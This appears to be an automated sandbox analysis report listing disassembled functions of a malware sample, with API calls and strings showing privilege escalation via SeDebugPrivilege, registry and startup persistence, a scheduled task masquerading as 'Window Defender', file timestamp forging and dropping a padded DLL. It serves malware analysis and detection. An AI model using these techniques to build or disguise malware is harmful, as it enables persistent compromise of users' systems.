Instruction Fuzzy Hash: 3FB0123300C30D7FAF055E81FC038593BEDEB40574B20401AF91C050616E33B530564C

Non-executed Functions

Function 100018EA Relevance: 50.1, APIs: 24, Strings: 4, Instructions: 1054COMMON

Download Yara Rule

APIs

Part of subcall function 10001772: GetCurrentProcess.KERNEL32(00000028,?), ref: 10001788
Part of subcall function 10001772: OpenProcessToken.ADVAPI32(00000000), ref: 1000178F

Part of subcall function 100017FE: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001821
Part of subcall function 100017FE: _memset.LIBCMT ref: 10001836
Part of subcall function 100017FE: Process32FirstW.KERNEL32(00000000,?), ref: 10001850
Part of subcall function 100017FE: CloseHandle.KERNEL32(00000000), ref: 1000188A

OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 1000192D
OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 10001947
CloseHandle.KERNEL32(?), ref: 10001954
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1000198A
OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 10001BCD
OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 10001BEB
CloseHandle.KERNEL32(?), ref: 10001BF8
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 10001C31
GetLengthSid.ADVAPI32(?), ref: 10001E1D
SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 10001E30
OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 10001E65
OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 10001E83
CloseHandle.KERNEL32(?), ref: 10001E90
GetLengthSid.ADVAPI32(?), ref: 100020B5
SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 100020C8
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 10002161
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 10001EC9

Part of subcall function 100018A0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 100018D8

OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 100020FD
OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 1000211B
CloseHandle.KERNEL32(?), ref: 10002128
GetLengthSid.ADVAPI32(?), ref: 1000234D
SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 10002360

Strings

, xrefs: 10002343
SeDebugPrivilege, xrefs: 10001915, 10001960, 100019AA, 10001BAE, 10001C07, 10001C49, 10001E46, 10001E9F, 10001EE1, 100020DE, 10002137, 10002179
, xrefs: 10001B74
0SafeMonClass, xrefs: 100018FB

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: Token$Process$Open$AdjustCloseHandlePrivileges$InformationLength$CreateCurrentFirstProcess32SnapshotToolhelp32_memset
String ID: $ $0SafeMonClass$SeDebugPrivilege
API String ID: 2960649016-366188185
Opcode ID: 60c0450e047e00c070692f6269e6c6ad3fa1c72c5e658460400b88cfb3fad4ca
Instruction ID: 253941792478b7e33a101aa4b16c8ff9649bddfa32550c9372af5835deac56ed
Opcode Fuzzy Hash: 60c0450e047e00c070692f6269e6c6ad3fa1c72c5e658460400b88cfb3fad4ca
Instruction Fuzzy Hash: CE721776E0110EBBEB04DBA4DD80DEEB7BEEF48280B514026F615E7145DB34EA068B65

Function 04292E16 Relevance: 15.2, APIs: 10, Instructions: 151comCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 04292E28
CoInitialize.OLE32(00000000), ref: 04292E2F
CoCreateInstance.COMBASE(1001BAA4,00000000,00000001,1001BA94,?), ref: 04292E51
SafeArrayAccessData.OLEAUT32(?,?), ref: 04292F0F
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 04292F22
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 04292F31

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID: ArraySafe$Bound$AccessCreateDataInitInitializeInstanceVariant
String ID:
API String ID: 1776067534-0
Opcode ID: 79661aefa36f05e11d082444c745240cc05e8509a7cb606758af6a29bcda15af
Instruction ID: e8e9fe5afc06a4dd7378fcc5f0ff3195bb0e788fc53b29fd04b59d2f2c1e6333
Opcode Fuzzy Hash: 79661aefa36f05e11d082444c745240cc05e8509a7cb606758af6a29bcda15af
Instruction Fuzzy Hash: A1510A71A10619FFEF11DFA4C888AAEBBB9EF49704B104895FD15EB210D771E9058B60

Function 10001772 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 10001788
OpenProcessToken.ADVAPI32(00000000), ref: 1000178F
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 100017A8
CloseHandle.KERNEL32(?), ref: 100017B5
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 100017E6

Strings

SeDebugPrivilege, xrefs: 100017A1

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID: SeDebugPrivilege
API String ID: 3038321057-2896544425
Opcode ID: f9a842ff66c4ec78a583601272a1e778934bfe3ea61c45c612d935d1b8297f68
Instruction ID: c94fb9c73ba85f91a1bf98ab1da07da24dcb44c607899cb9a50e2487d36010b3
Opcode Fuzzy Hash: f9a842ff66c4ec78a583601272a1e778934bfe3ea61c45c612d935d1b8297f68
Instruction Fuzzy Hash: 4A112970A04219EBFB01CFE1CC8ABEEBBB8FB08744F008419E605EB180D774E9459B60

Function 100017FE Relevance: 9.1, APIs: 6, Instructions: 51processstringCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001821
_memset.LIBCMT ref: 10001836
Process32FirstW.KERNEL32(00000000,?), ref: 10001850
lstrcmpiW.KERNEL32(?,?), ref: 10001865
Process32NextW.KERNEL32(00000000,0000022C), ref: 10001877
CloseHandle.KERNEL32(00000000), ref: 1000188A

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memsetlstrcmpi
String ID:
API String ID: 2129496168-0
Opcode ID: 2df0ab7da211292d62b89e19d4eeb0713746dd467ce8847cf4809c4c5c49a5c1
Instruction ID: 3ffd4d5cd6538f8ebec0314673e2b0490979e690ee2c66a7f099f0b82d5c42d3
Opcode Fuzzy Hash: 2df0ab7da211292d62b89e19d4eeb0713746dd467ce8847cf4809c4c5c49a5c1
Instruction Fuzzy Hash: 33110971A00218EBEB11DFA5DCC9AAEB7BCFB08684F1041A9E509D2150DB78EF44CB61

Function 0429A505 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0429C5D9
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0429C5EE
UnhandledExceptionFilter.KERNEL32(10017614), ref: 0429C5F9
GetCurrentProcess.KERNEL32(C0000409), ref: 0429C615
TerminateProcess.KERNEL32(00000000), ref: 0429C61C

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 0c6e12013528028966c606dde08bd82a8eb63e0bad2ee112bf7fee5026609698
Instruction ID: 30d28864d010911234fab82e94adc560adfa6405f757956dccb624c298f40f0a
Opcode Fuzzy Hash: 0c6e12013528028966c606dde08bd82a8eb63e0bad2ee112bf7fee5026609698
Instruction Fuzzy Hash: EB219EB4914364EFF751DF29CCC86547BBABB08314F60815AF90887672E7B1AA86CF05

Function 1000A501 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 1000C5D5
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1000C5EA
UnhandledExceptionFilter.KERNEL32(10017614), ref: 1000C5F5
GetCurrentProcess.KERNEL32(C0000409), ref: 1000C611
TerminateProcess.KERNEL32(00000000), ref: 1000C618

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 0c6e12013528028966c606dde08bd82a8eb63e0bad2ee112bf7fee5026609698
Instruction ID: c5e426f1109fde4803e617754598a24d866d1cc6d4e93cd83816215881de0859
Opcode Fuzzy Hash: 0c6e12013528028966c606dde08bd82a8eb63e0bad2ee112bf7fee5026609698
Instruction Fuzzy Hash: 5A21BBB8804364EBF741DF28CCC86547BAAFB08314F60811AF40897272E7719A86CB05

Function 042918A4 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 042918DC

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 0750d940eb4f66e49c8509644eb6e6eaf79ec723170f3abbc9985c62f060c6b7
Instruction ID: 1cabbbd2aaf9fcf9a39e6c8bcf54f02ceb56820f8e1e98abf05d8cbc3929b062
Opcode Fuzzy Hash: 0750d940eb4f66e49c8509644eb6e6eaf79ec723170f3abbc9985c62f060c6b7
Instruction Fuzzy Hash: B0F0ACB4A00209AFEB00DFA8C885ABEBBF9FB48304F418559E905DB251D7B0A9448B95

Function 100018A0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 100018D8

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 0750d940eb4f66e49c8509644eb6e6eaf79ec723170f3abbc9985c62f060c6b7
Instruction ID: 040ad90355cb0a273dcfa4f8fbf83e3e1174ec4bc9b7d15bd186d8f56e51e7e8
Opcode Fuzzy Hash: 0750d940eb4f66e49c8509644eb6e6eaf79ec723170f3abbc9985c62f060c6b7
Instruction Fuzzy Hash: 5DF0C0B4A00209AFEB00DFA8C885EBFBBF9FF48304F408559E905DB351D7B0A9448B95

Function 042964A6 Relevance: .3, Instructions: 339COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4c8aae7e42e3bcbbc9adda166d2297b63f01e91f4d3e5f47e8d5f8886ecb1be
Instruction ID: 4ddecf51d7f4dae417e2aeb364423fa30f2d3c50ac6e8174294d7bfbdba1d8fe
Opcode Fuzzy Hash: f4c8aae7e42e3bcbbc9adda166d2297b63f01e91f4d3e5f47e8d5f8886ecb1be
Instruction Fuzzy Hash: CBF1B275E102298FDF64CF28C890B9DB7F2BB89314F1581EAC94DA7245DA306E85CF91

Function 100064A2 Relevance: .3, Instructions: 339COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4c8aae7e42e3bcbbc9adda166d2297b63f01e91f4d3e5f47e8d5f8886ecb1be
Instruction ID: ca287531272148182e2a4c1013a3c0c1369dd11ad5a7dfe37625cce3747b3fff
Opcode Fuzzy Hash: f4c8aae7e42e3bcbbc9adda166d2297b63f01e91f4d3e5f47e8d5f8886ecb1be
Instruction Fuzzy Hash: D4F1D275E042298FEB64CF28CC9079DB7B2FB49254F2581EAC84DA7245DB306E85CF91

Function 04290B11 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
Instruction ID: 65768bfb8588b811a1b104a459964e9a5de4afe061cb159aa080eba969b63ef1
Opcode Fuzzy Hash: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
Instruction Fuzzy Hash: 7C319A76A1874B8FCB10DF18C490A2AF3E4FF89318B09096DE99597312E374F955CB91

Function 0429B904 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 82493402305385ee48b78e1c1b4595fb785bcf6e15bcd253b1326030e7b83d29
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 2811037737015343BE048A2EF8B42A6EFD6FBCA32072D526EC0854B25AD162B9419D08

Function 1000B900 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 7803ec30f91b7029f58af8cd0b16b508c8908f2f84e137656bb773f65adef076
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 6F112B77640D8383F681CD2ED4B46ABE3DAEFC62E0B29437AD2824B65CD22299459600

Function 04296E41 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8223c184387945c1fb1f8b9d386c8107abf76b8eb19074b24e68793b24c2442
Instruction ID: 2c5be4bc7837168567d82c04916c0aa00b56e3d7d0cc31ea53cc13564180b33c
Opcode Fuzzy Hash: a8223c184387945c1fb1f8b9d386c8107abf76b8eb19074b24e68793b24c2442
Instruction Fuzzy Hash: 7F21D5226B0EF206CB459FFCECC011727D18B8E11675DC3A6EAA4CE051C1BDE622C660

Function 10006E3D Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8223c184387945c1fb1f8b9d386c8107abf76b8eb19074b24e68793b24c2442
Instruction ID: 54eee8e86585e5215b5803947df559b0e46e26245c461bafb14746debafb24c4
Opcode Fuzzy Hash: a8223c184387945c1fb1f8b9d386c8107abf76b8eb19074b24e68793b24c2442
Instruction Fuzzy Hash: 5F21A122AB0EF206D7449BF8ECC011727D1CB8E11636DC366EAA4CD061C1BDD622C660

Function 10001144 Relevance: 58.1, APIs: 21, Strings: 12, Instructions: 338registryCOMMON

Download Yara Rule

APIs

_wprintf.LIBCMT ref: 10001192
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,100195D4,0000000A), ref: 100011B0
RegCloseKey.ADVAPI32(?), ref: 100011C0
_memset.LIBCMT ref: 100012B7
RegCloseKey.ADVAPI32(?), ref: 100012EE
SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000), ref: 100012FF
_memset.LIBCMT ref: 10001318
_sprintf.LIBCMT ref: 100013C3
_memset.LIBCMT ref: 10001471
RegCreateKeyExA.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 10001496
_sprintf.LIBCMT ref: 100014B7
RegSetValueExA.ADVAPI32(?,1001962C,00000000,00000001,?,?), ref: 100014E8
_sprintf.LIBCMT ref: 10001509
DefineDosDeviceA.KERNEL32(00000001,1001962C,?), ref: 1000151B
_memset.LIBCMT ref: 1000154C
_sprintf.LIBCMT ref: 10001566
_memset.LIBCMT ref: 100015A7
_memset.LIBCMT ref: 100015BE
_memset.LIBCMT ref: 10001619
_memset.LIBCMT ref: 1000162D
MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 1000165A

Strings

grams, xrefs: 100013AD
QWQ\ShellEx\ContextMenuHandlers\{00021401-0000-0000-C000-000000000046}, xrefs: 100012D0, 100012D6
rosoft\Wind, xrefs: 10001347
%s\1.qwq1, xrefs: 10001558, 1000155E
nu\Pro, xrefs: 1000138E
ows\St, xrefs: 1000135E
.qwq, xrefs: 10001606
1, xrefs: 10001610
SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices, xrefs: 1000148A, 10001490
%s\Mic, xrefs: 1000132F
[:\1.qwq1, xrefs: 100015C8
art Me, xrefs: 10001376

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: _memset$_sprintf$CloseValue$CreateDefineDeviceFileFolderMovePathSpecial_wprintf
String ID: %s\1.qwq1$%s\Mic$.qwq$1$QWQ\ShellEx\ContextMenuHandlers\{00021401-0000-0000-C000-000000000046}$SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices$[:\1.qwq1$art Me$grams$nu\Pro$ows\St$rosoft\Wind
API String ID: 1177859221-1427731300
Opcode ID: dd203d5e68e146d2d8d35a072c78427b362adfbb93d1c2cfe64de85bad0544cb
Instruction ID: 5e77c6fea4325d479937a6c85de82ae530236ccce02044bcbca6b124a08d5227
Opcode Fuzzy Hash: dd203d5e68e146d2d8d35a072c78427b362adfbb93d1c2cfe64de85bad0544cb
Instruction Fuzzy Hash: 1BD17AB184126DAEEB22DF548C84FEAB7BDFB04380F4045E5E649AB105DB709F858F61

Function 042914B7 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 126registryCOMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 042914BB
RegSetValueExA.ADVAPI32(?,1001962C,?,00000001,?,?), ref: 042914EC
_sprintf.LIBCMT ref: 0429150D
DefineDosDeviceA.KERNEL32(00000001,1001962C,?), ref: 0429151F
_memset.LIBCMT ref: 04291550
_sprintf.LIBCMT ref: 0429156A
_memset.LIBCMT ref: 042915AB
_memset.LIBCMT ref: 042915C2
_memset.LIBCMT ref: 0429161D
_memset.LIBCMT ref: 04291631
MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0429165E

Strings

tart, xrefs: 042915F6
%s\1.qwq1, xrefs: 0429155C, 04291562
[:\S, xrefs: 042915EC
.qwq, xrefs: 0429160A
1, xrefs: 04291614
up\1, xrefs: 04291600

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID: _memset$_sprintf$DefineDeviceFileMoveValue
String ID: %s\1.qwq1$.qwq$1$[:\S$tart$up\1
API String ID: 3652080668-2429600194
Opcode ID: 2722c036afaf77bf298d045a55e73282290402bd08fd007bf2cfaf8c4f92b27b
Instruction ID: a964a3bc9486c9eff3c95fdf3f76b4f48b68aa9d2ef2ac676079097a5238c2e0
Opcode Fuzzy Hash: 2722c036afaf77bf298d045a55e73282290402bd08fd007bf2cfaf8c4f92b27b
Instruction Fuzzy Hash: 4C418FB1A5122DAEEF11DF649C44BEA77FCAF48244F0055E5D24DE7101D6309F888FA1

Function 0429238C Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 398comCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 04292396
CoInitializeEx.COMBASE(00000000,00000000), ref: 0429239F
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 042923B1
CoCreateInstance.COMBASE(100174F0,00000000,00000001,100172E0,?), ref: 042923CB
VariantInit.OLEAUT32(?), ref: 042923D8
VariantInit.OLEAUT32(?), ref: 042923F8
VariantInit.OLEAUT32(?), ref: 04292415
VariantInit.OLEAUT32(?), ref: 04292432

Part of subcall function 042916CE: __EH_prolog3.LIBCMT ref: 042916D5
Part of subcall function 042916CE: SysAllocString.OLEAUT32(?), ref: 042916FD

_memset.LIBCMT ref: 042926A2
_memset.LIBCMT ref: 042926D5
_mbstowcs.LIBCMT ref: 042926ED
VariantInit.OLEAUT32(?), ref: 042927B2
VariantInit.OLEAUT32(?), ref: 042927CF
CoUninitialize.COMBASE ref: 0429287F

Strings

n, xrefs: 0429254D
atio, xrefs: 04292546
Window Defender UqdataMicrosoft Corporation, xrefs: 042927E8, 042927EC

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID: InitVariant$Initialize_memset$AllocCreateH_prolog3H_prolog3_InstanceSecurityStringUninitialize_mbstowcs
String ID: Window Defender UqdataMicrosoft Corporation$atio$n
API String ID: 2940185448-2587304410
Opcode ID: 7895a36a98caa6a1b9973c65e0fbdfbb4afb65271a52eed45e1ff492932daf53
Instruction ID: 5f492419dde9336103f14833f19ff03aa07a7e60dc6bfdda0ee6009570f297bc
Opcode Fuzzy Hash: 7895a36a98caa6a1b9973c65e0fbdfbb4afb65271a52eed45e1ff492932daf53
Instruction Fuzzy Hash: 6FF11771A10629AFDF22DF64CC84AAEB7BDAF45304F0085D5E909AB250C771AF86CF50

Function 10002388 Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 398comCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 10002392
CoInitializeEx.COMBASE(00000000,00000000), ref: 1000239B
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 100023AD
CoCreateInstance.COMBASE(100174F0,00000000,00000001,100172E0,?), ref: 100023C7
VariantInit.OLEAUT32(?), ref: 100023D4
VariantInit.OLEAUT32(?), ref: 100023F4
VariantInit.OLEAUT32(?), ref: 10002411
VariantInit.OLEAUT32(?), ref: 1000242E

Part of subcall function 100016CA: __EH_prolog3.LIBCMT ref: 100016D1
Part of subcall function 100016CA: SysAllocString.OLEAUT32(?), ref: 100016F9

_memset.LIBCMT ref: 1000269E
_memset.LIBCMT ref: 100026D1
_mbstowcs.LIBCMT ref: 100026E9
VariantInit.OLEAUT32(?), ref: 100027AE
VariantInit.OLEAUT32(?), ref: 100027CB

Part of subcall function 1000172A: InterlockedDecrement.KERNEL32(?), ref: 10001735
Part of subcall function 1000172A: SysFreeString.OLEAUT32(00000000), ref: 1000174A

CoUninitialize.COMBASE ref: 1000287B

Strings

n, xrefs: 10002549
Window Defender UqdataMicrosoft Corporation, xrefs: 100027E4, 100027E8
atio, xrefs: 10002542

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: InitVariant$InitializeString_memset$AllocCreateDecrementFreeH_prolog3H_prolog3_InstanceInterlockedSecurityUninitialize_mbstowcs
String ID: Window Defender UqdataMicrosoft Corporation$atio$n
API String ID: 409417733-2587304410
Opcode ID: 1bcf64d90fbd1cfe5ab6caf9c032670dc548f2cf978397468f022cb24031ec91
Instruction ID: 72b668da65d98a1bb4e32f39a60bc430f8e3b8a7c7e261b5aafb9a33d3e2515c
Opcode Fuzzy Hash: 1bcf64d90fbd1cfe5ab6caf9c032670dc548f2cf978397468f022cb24031ec91
Instruction Fuzzy Hash: 90F10671900629AFDB12DF64CC84A9EB7BDEF45304F0085D5E909AB254D671AF8A8F90

Function 04298A82 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 252filetimeCOMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 04298B79
_memset.LIBCMT ref: 04298BAD
_memset.LIBCMT ref: 04298BD1
_strcat_s.LIBCMT ref: 04298BEC
_sprintf.LIBCMT ref: 04298C6D
_sprintf.LIBCMT ref: 04298C95
CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,00000010,?,00000001), ref: 04298CCB
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,00000010,?,00000001), ref: 04298D54
SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000010,?,00000001), ref: 04298DA0
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000010,?,00000001), ref: 04298DAC

Strings

:, xrefs: 04298C4C
\, xrefs: 04298C36
%s%s, xrefs: 04298C67
text.e, xrefs: 04298B90

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID: File$_memset_sprintf$CloseCreateHandleTimeWrite__fassign_strcat_s
String ID: %s%s$:$\$text.e
API String ID: 3001508280-2720340845
Opcode ID: f4a56289870efe9949b7a71bcc4694e6ac4cf3ab3c97a2aa9d2ec6e6fb0b7cd4
Instruction ID: 7dc1987e12c8ec3f14ff5b6b808b40a91d6fe610f5b4d9c3d6cf993e28c8ac63
Opcode Fuzzy Hash: f4a56289870efe9949b7a71bcc4694e6ac4cf3ab3c97a2aa9d2ec6e6fb0b7cd4
Instruction Fuzzy Hash: 899186B1A206199BEF35EA24CC84BEAB7F8AF0A355F0801D6E518A7140D7707EC5CF91

Function 04292C0C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111filesleepCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 04292C4B
_memset.LIBCMT ref: 04292C74
Sleep.KERNEL32(00000001), ref: 04292C94
_malloc.LIBCMT ref: 04292CCE
_memset.LIBCMT ref: 04292CFB
WriteFile.KERNEL32(?,00000000,1F400000,?,00000000), ref: 04292D13
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 04292D42
FlushFileBuffers.KERNEL32(?), ref: 04292D4E
CloseHandle.KERNEL32(?), ref: 04292D5A

Strings

lib, xrefs: 04292C8C
cef.dll, xrefs: 04292CA9

Memory Dump Source

Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd

Similarity

API ID: File$Write_memset$BuffersCloseCreateFlushHandleSleep_malloc
String ID: cef.dll$lib
API String ID: 784045994-1944707463
